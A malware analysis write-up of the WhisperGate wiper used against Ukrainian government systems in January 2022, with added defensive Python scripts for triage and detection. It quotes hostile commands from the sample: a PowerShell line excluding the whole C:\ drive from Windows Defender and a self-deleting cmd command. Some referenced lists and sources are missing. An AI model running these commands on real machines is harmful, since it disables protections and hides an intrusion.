Wednesday, 26 January 2022

Analysis of WhisperGate


Summary of the attack

  • Name: WhisperGate

  • Discovered in January 2022

  • Used in a targeted attack against Ukrainian government websites on the 14th of January, 2022

  • Overwrites the contents of files with a fixed number of bytes

  • Rewrites the MBR, corrupts victims’ files, downloads and drops its own files

  • Corrupted files receive a random 4-byte extension

  • Comes in two stages: a PE64 executable written in C++ and a .NET application with fake digital signatures

  • The third stage is a .NET DLL, which is downloaded at runtime

by Denis Popov and Alexander Adamov


On January 13, 2022, multiple government sites in Ukraine were shut down due to a large-scale cyberattack by WhisperGate malware. In particular, the websites of the Cabinet of Ministers, the Ministry of Foreign Affairs, the Ministry of Sports, the Ministry of Energy, the Ministry of Agrarian Policy, the Ministry of Veterans Affairs, the website of the State Treasury, and state services website Diya stopped working. All users received a note with the following warning:

"Ukrainian! All your personal data has been uploaded to the public network. All data on the computer is destroyed, it is impossible to recover them. All information about you has become public, be afraid and expect the worst. This is for your past, present and future. For Volyn, for the OUN UPA, for Galicia, for Polissya, and for historical lands."

Microsoft's threat intelligence team named this activity "DEV-0586" and identified it as destructive malware masquerading as ransomware. Its main purpose is to disrupt the system and damage files beyond any possibility of recovery.

Technical Details

Defacement of the government websites

Two types of defacement have been discovered by CERT-UA:

  • Complete replacement of the main page (index.php)
  • Injection of a malicious script into the website that replaces its content

The suspected attack vectors are:

  • supply chain attack
  • the exploitation of OctoberCMS and/or Log4j vulnerabilities

The traces of the commands executed by the attackers are shown below:

.bash_history (source:

MBR Writer (stage1.exe)

The threat actor uses the Impacket tool collection for lateral movement and malware execution. The first file ‘stage1.exe’ is a PE64 executable written in C++ and compiled with the MinGW compiler. This file can be placed in different directories, for example, C:\PerfLogs, C:\ProgramData, C:\, C:\temp. At the beginning of execution, the malware opens ‘\\\\.\\PhysicalDrive0’ (the C-escaped form of the device path \\.\PhysicalDrive0), i.e. the raw physical disk that contains the Master Boot Record (MBR). Then it writes the hardcoded ransom note to the MBR area as well as to every 199th sector of the disk. Because the MBR has been overwritten, the system will no longer boot after a restart; instead, the ransom note is displayed.

The hardcoded ransom note:

Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.

Obtaining access to the MBR and rewriting it 

This behavior is atypical for ransomware, whose main purpose is to encrypt files and demand a ransom for their decryption, usually leaving the system itself operable. In this case, the malware changes the MBR, which prevents the system from starting. This means that the ransom note is a fake and the main purpose of the malware is to disrupt system operability.
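As an added example (not code from the original analysis), the following script performs offline triage of a raw disk image for the MBR overwrite described above: it checks whether sector 0 still carries the conventional 0x55AA boot signature, locates every sector that contains the first line of the ransom note, and tests whether the hits follow the "every 199th sector" pattern reported for stage1.exe. The disk images are constructed in memory; the placeholder boot-code bytes, the image size and the assumption that the note lands on sector 0 and multiples of 199 are all assumptions made for the sample.

```python
# Added example (not from the original analysis): offline triage of a raw disk
# image for a WhisperGate-style MBR overwrite. Images are constructed in memory.

SECTOR = 512
STRIDE = 199                       # the analysis reports the note in every 199th sector
NOTE_MARKER = b"Your hard drive has been corrupted."   # first line of the quoted note


def has_boot_signature(image: bytes) -> bool:
    """A conventional MBR ends with the 0x55AA boot signature at offset 510."""
    return image[510:512] == b"\x55\xAA"


def find_note_sectors(image: bytes, marker: bytes = NOTE_MARKER) -> list:
    """Return the indices of all sectors that contain the ransom-note marker."""
    hits = []
    for idx in range(len(image) // SECTOR):
        sector = image[idx * SECTOR:(idx + 1) * SECTOR]
        if marker in sector:
            hits.append(idx)
    return hits


def matches_stride(hits, stride: int = STRIDE) -> bool:
    """True when every hit sits on a multiple of the stride (sector 0 included)."""
    return bool(hits) and all(h % stride == 0 for h in hits)


def triage_image(image: bytes) -> dict:
    """Summarise the three checks for one image."""
    hits = find_note_sectors(image)
    return {
        "boot_signature_present": has_boot_signature(image),
        "note_sectors": hits,
        "stride_pattern": matches_stride(hits),
    }


def build_sample_images(n_sectors: int = 1000):
    """Constructed images: a clean disk and the same disk after the overwrite."""
    clean = bytearray(n_sectors * SECTOR)
    clean[0:4] = b"\xFA\x33\xC0\x8E"          # placeholder boot-code bytes (constructed)
    clean[510:512] = b"\x55\xAA"
    wiped = bytearray(clean)
    note_sector = NOTE_MARKER.ljust(SECTOR, b"\x00")
    for idx in range(0, n_sectors, STRIDE):   # assumption: sector 0 plus every 199th sector
        wiped[idx * SECTOR:(idx + 1) * SECTOR] = note_sector
    return bytes(clean), bytes(wiped)


if __name__ == "__main__":
    clean_img, wiped_img = build_sample_images()
    print("clean:", triage_image(clean_img))
    print("wiped:", triage_image(wiped_img))
```

To run this against a real acquisition, read the image file with `open(path, "rb").read()` (or memory-map it for large disks) and pass the bytes to `triage_image`; the marker string and stride are the only WhisperGate-specific inputs.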

The traces of stage1.exe execution discovered by CERT-UA are shown below:

stage1.exe execution (source:

Trojan-Downloader (stage2.exe)

The second file ‘stage2.exe’ is a .NET application that carries a Microsoft Windows signature supposedly taken from the Russian version of Windows Explorer, according to the properties shown in File Details. This file is also obfuscated with Eazfuscator.

It’s used to download the File Corrupter and contains a hardcoded Discord link:

Download data from the hardcoded link

This file also contains a Base64-encoded command, ‘UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==’, which is passed to PowerShell with the ‘-enc’ parameter. This means that PowerShell decodes the string before executing it. The decoded command is ‘Start-Sleep -s 10’. It suspends execution for the specified period and is used as a delay around the C2 server connection.

Executing the encoded PowerShell command

File Corrupter (Tbopbh.jpg / Frkmlkdkdubkznbkmcf.dll)

The downloaded file Tbopbh.jpg, which is presented as a picture, is decoded into Frkmlkdkdubkznbkmcf.dll (SHA256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6). This file is a .NET library and contains 3 resources:

Frkmlkdkdubkznbkmcf.dll loads resource ‘78c855a088924e92a7f60d661c3d1845’ and calls the decryption function.

Resource loading

The decryption function decodes this resource using the XOR operation.
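The analysis states that the resource is XOR-decoded but does not give the key or its length, so the following added example (not code from the original analysis, and not the sample's own routine) shows the generic analyst technique for recovering such a key from an extracted blob: the standard DOS/PE header that every .NET assembly starts with serves as known plaintext, the candidate key is derived from it, and the result is verified by checking for the "MZ" magic and the DOS stub text. The sample blob, the keys 0x5A and b"k3y!", and the 16-byte known prefix are assumptions made for the sample.

```python
# Added example (not from the original analysis). Recovers a single-byte or
# short repeating XOR key from an encoded PE resource using known plaintext.

# First 16 bytes of the conventional DOS stub at the start of PE files
# (assumption: the target was built with a toolchain that emits this stub).
KNOWN_PE_PREFIX = bytes.fromhex("4D5A90000300000004000000FFFF0000")
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (a 1-byte key is the single-byte case)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Cheap plausibility check on a decoded candidate."""
    return data[:2] == b"MZ" and DOS_STUB_TEXT in data[:512]


def recover_single_byte_key(blob: bytes):
    """Brute-force the 256 one-byte keys; return the first that yields a PE."""
    for k in range(256):
        if looks_like_pe(xor_with_key(blob[:512], bytes([k]))):
            return k
    return None


def derive_repeating_key(blob: bytes, key_len: int, known: bytes = KNOWN_PE_PREFIX) -> bytes:
    """Known-plaintext step: key[i] = cipher[i] XOR plain[i] for the first key_len bytes."""
    if key_len > len(known):
        raise ValueError("known prefix is shorter than the key length")
    return bytes(blob[i] ^ known[i] for i in range(key_len))


def recover_repeating_key(blob: bytes, max_len: int = 16):
    """Try key lengths 1..max_len; accept the first key whose output looks like a PE."""
    for key_len in range(1, max_len + 1):
        key = derive_repeating_key(blob, key_len)
        if looks_like_pe(xor_with_key(blob[:512], key)):
            return key
    return None


def make_sample_blob(key: bytes) -> bytes:
    """Constructed PE-like plaintext encoded with the given key (sample data only)."""
    plain = KNOWN_PE_PREFIX + b"\x00" * 48 + DOS_STUB_TEXT + b"\x00" * 200
    return xor_with_key(plain, key)


if __name__ == "__main__":
    print("single-byte key:", hex(recover_single_byte_key(make_sample_blob(b"\x5a"))))
    print("repeating key:", recover_repeating_key(make_sample_blob(b"k3y!")))
```

For a real resource the same calls apply to the raw bytes extracted from the .NET assembly; if the known-prefix approach fails, the stub may differ from the conventional one, and the single-byte brute force is the fallback.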

Decoding resource

During execution, the decoded resource drops two additional files into the %Temp% folder. The first file is ‘AdvancedRun.exe’, which disables Windows Defender by executing the second file, ‘Nmddfrqqrbyjeygggda.vbs’. This script contains a command that excludes the entire ‘C:\’ drive from Windows Defender scanning:

CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False

Next, the malware drops ‘InstallUtil.exe’ into the ‘%Temp%’ folder and executes it. This program is the Microsoft utility for installing server resources and has a valid digital signature.

InstallUtil.exe properties

During execution, this program writes 22.53 GB to disk. The original program does not contain any suspicious code, so we can assume that WhisperGate injects malicious code into this process to perform the file corruption.

The File Wiper corrupts the files with the following file extensions:


If the file extension matches one of these saved extensions, the contents of the file are overwritten with 100000h (1,048,576) bytes of the ‘0xC’ byte value, and 4 random bytes are appended to its extension.
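As an added example (not code from the original analysis), the following content-based detector identifies files corrupted in the way described above: it checks whether the first 100000h bytes consist of one repeated byte value and whether the extension is a known one with exactly four extra characters appended. The detector accepts any uniform fill byte rather than relying on the exact value, so it also catches files wiped with a different constant. The sample data, the extension list (the page's own list is not reproduced here) and the fill byte used to build the sample are constructed.

```python
import re

# Added example (not from the original analysis): identify files whose first
# 100000h bytes were overwritten with one repeated byte value and whose
# extension carries four appended characters.

WIPE_LENGTH = 0x100000                                      # 1,048,576 bytes, as reported
SAMPLE_EXTENSIONS = {"docx", "xlsx", "pdf", "jpg", "php"}   # constructed list
_NAME_RE = re.compile(r"^(?P<stem>.+?)\.(?P<ext>[^.]+)$")


def looks_wiped(data: bytes, wipe_length: int = WIPE_LENGTH):
    """(True, fill_byte) if the overwritten region is one repeated byte, else (False, None)."""
    head = data[:wipe_length]
    if len(head) < 16:                 # too small to judge
        return False, None
    fill = head[:1]
    if head.count(fill) == len(head):  # every byte equals the first one
        return True, fill[0]
    return False, None


def split_wiped_extension(name: str, known=SAMPLE_EXTENSIONS):
    """(original_ext, suffix) if the extension is a known one plus exactly 4 extra chars."""
    m = _NAME_RE.match(name)
    if not m:
        return None
    ext = m.group("ext")
    for known_ext in known:
        if ext.lower().startswith(known_ext) and len(ext) == len(known_ext) + 4:
            return known_ext, ext[len(known_ext):]
    return None


def assess_file(name: str, data: bytes) -> dict:
    """Combine the content check and the name check for one file."""
    wiped, fill = looks_wiped(data)
    return {
        "name": name,
        "content_wiped": wiped,
        "fill_byte": fill,
        "extension_suffix": split_wiped_extension(name),
    }


def make_sample_wiped(original: bytes, fill_byte: int = 0x0C) -> bytes:
    """Constructed victim file: the first WIPE_LENGTH bytes replaced by fill_byte
    (the fill value here is a sample choice, not taken from the malware)."""
    return bytes([fill_byte]) * WIPE_LENGTH + original[WIPE_LENGTH:]


if __name__ == "__main__":
    print(assess_file("report.docxa1b2", make_sample_wiped(b"PK\x03\x04" + b"Z" * 3_000_000)))
    print(assess_file("report.docx", b"PK\x03\x04" + b"Z" * 100))
```

Used in recovery triage, a file that is flagged by both checks is unrecoverable from its own contents and must come from backups; a file whose tail beyond the first 1 MiB is intact may still yield fragments (for example, trailing archive members) to carving tools.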

After file corruption is complete, the malware runs a ping command as a short delay and then deletes itself:

"cmd.exe /min /C ping -n 5 -w 10 > Nul & Del /f /q "%s"


All .NET files are obfuscated with Eazfuscator. In addition, the file ‘stage2.exe’ has control-flow and method-name obfuscation.

Ransom note

The ransom note is written to the MBR (the very beginning of the bootable disk) and is displayed on the screen when the system is rebooted.


WhisperGate was used in the targeted attack against Ukrainian government websites in the middle of January 2022. The operation consists of two stages. In the first stage, the malware overwrites the MBR with the ransom note, making the system unbootable and displaying the ransom message. In the second stage, the Trojan-Downloader downloads the malware that corrupts files by overwriting their contents with a fixed number of bytes. Although the malware disrupted operations and all the affected websites stopped working, they were restored the next day.

Watch the recording of the lecture with WhisperGate analysis

File name

Network indicators

MITRE attack techniques

  1. Lecture recording
